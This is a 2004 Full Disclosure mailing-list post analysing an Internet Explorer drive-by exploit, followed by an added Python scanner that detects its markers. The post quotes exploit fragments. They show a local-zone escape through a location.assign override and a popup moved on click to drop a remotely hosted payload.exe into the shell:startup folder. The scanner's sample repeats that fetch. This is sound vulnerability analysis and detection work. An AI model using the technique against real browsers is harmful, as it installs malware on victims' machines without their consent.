Full Disclosure mailing list archives

Re: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!]


From: Alla Bezroutchko <alla () scanit be>
Date: Tue, 07 Sep 2004 16:10:18 +0200

Martin Stricker wrote:
I just got attached e-mail. On the linked website I found this exploit
code (sorry for the line breaks):

As far as I can figure out it is a combination of two unpatched vulnerabilities. First it uses the method assignment vulnerability (discovered by Paul (at) greyhats cjb net - see http://www.securityfocus.com/archive/1/368671) to get into the Local Computer zone:

function govuln(){
var w=window.open("javascript:wait for parent to change domain and then call location.assign with a javascript url");
    w.location.assign=location.assign;
    location.href="http://localhost";;
}

Once in local computer zone it does what I believe is a variation of drag and drop file installation vulnerability discovered by http-equiv. The interesting twist is that instead of tricking the user into dragging and dropping something (as mikx demonstrated at http://www.mikx.de/scrollbar/) they get the user to click on an image and then pull the window with the image from under the mouse to emulate drag and drop.

First they create an iframe with shell:startup folder.

<iframe src=shell:startup HEIGHT=5000; WIDTH=5000 style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-index:-90;>
  </iframe>

Then they open a popup window that covers the whole screen and shows an image 1.gif using styles. The src of the image points to the payload executable. The image is an animated gif that first shows a counter and then says "Click to enter".

  <body onload=showpop()>
     <script>
         function showpop(){
              pop=window.createPopup();
              pop.document.body.style.margin=0;
              pop.document.body.innerHTML=txt.value;
              pop.show(100,100,screen.width+300,screen.height+300);
         }
     </script>
     <span style=position: absolute; left: 1; top: 1 id=absspan>
     </span>
     <textarea id=txt rows=1 cols=20 style=display:none>
<html><body><table width=100% height=100%><tr ALIGN=LEFT VALIGN=TOP><br><center><img src=http://removed/payload.exe id=anch onmousedown=parent.pop.show(1,1,1,1); style=width=4000px;height=4000px;background-image:url('http://removed/1.gif&apos;);></a></td></tr></table>
     </textarea>
   </body>

When the user clicks on the image, the underlying popup window is moved by calling parent.pop.show(1,1,1,1). So the image is effectively dragged into shell:startup, and the executable is installed in the startup folder. This technique (pull the window from under the mouse to emulate drag and drop) AFAIK was first shown by Liu Die Yu in HijackClick (http://umbrella.name/originalvuln/msie/HijackClick/HijackClick-Content.HTM)

Another trick that they use is to download the payload executable first, using XmlHTTP object. I think this is to get it cached, and make the whole exploit more reliable.

Also interesting that they don't use
"a {behavior:url(#default#AnchorClick);}"
in this exploit which seems to be an essential part of http-equiv's and mikx's exploits.

Alla.
--
Scanit Belgium
Browser Security Test - http://bcheck.scanit.be/bcheck/
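As an added example that is not part of Alla's post or of the exploit she quotes: a small Python scanner that counts the indicators her analysis describes in raw HTML (an iframe with a shell: src, createPopup plus a .show() call bound to a mouse event, an img whose src is an executable, and the location.assign override followed by a navigation to localhost) and combines them into the two behaviours discussed. The sample documents and the hostname example.invalid are constructed here.

```python
import re

# One regex per indicator named in the analysis above. Matching runs over the
# raw document text, so markup hidden inside a <textarea> or <script> is seen too.
INDICATORS = {
    "shell_protocol_frame": re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]?shell:", re.I),
    "location_assign_override": re.compile(r"\.location\.assign\s*=\s*location\.assign", re.I),
    "local_zone_navigation": re.compile(r"location\.href\s*=\s*['\"]http://localhost", re.I),
    "popup_moved_on_mouse": re.compile(r"onmouse(?:down|up)\s*=\s*['\"]?[^>]*\.show\s*\(", re.I),
    "executable_image_src": re.compile(r"<img[^>]*\bsrc\s*=\s*['\"]?[^\s'\">]+\.exe\b", re.I),
    "create_popup": re.compile(r"\bcreatePopup\s*\(", re.I),
}


def scan_html(html: str) -> dict:
    """Return a count of each indicator found in the document text."""
    return {name: len(rx.findall(html)) for name, rx in INDICATORS.items()}


def classify(hits: dict) -> list:
    """Combine single indicators into the two behaviours the post describes."""
    verdicts = []
    if hits["location_assign_override"] and hits["local_zone_navigation"]:
        verdicts.append("local-zone escape via location.assign override")
    if (hits["shell_protocol_frame"] and hits["popup_moved_on_mouse"]
            and hits["executable_image_src"]):
        verdicts.append("drag-and-drop emulation into a shell: folder")
    return verdicts


# Constructed sample carrying the same markers as the quoted page (not the exploit itself).
SUSPICIOUS = """<html><body onload=showpop()>
<script>
function showpop(){ pop=window.createPopup(); pop.show(100,100,4000,4000); }
function govuln(){ var w=window.open("javascript:x"); w.location.assign=location.assign; location.href="http://localhost"; }
</script>
<iframe src=shell:startup style=position:absolute;left:-2000></iframe>
<textarea id=txt style=display:none>
<img src=http://example.invalid/payload.exe onmousedown=parent.pop.show(1,1,1,1); style=width=4000px>
</textarea></body></html>"""

# Constructed benign page: an ordinary image and a normal iframe.
BENIGN = '<html><body><img src="/logo.png"><iframe src="https://example.invalid/"></iframe></body></html>'

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, classify(scan_html(doc)))
```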

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
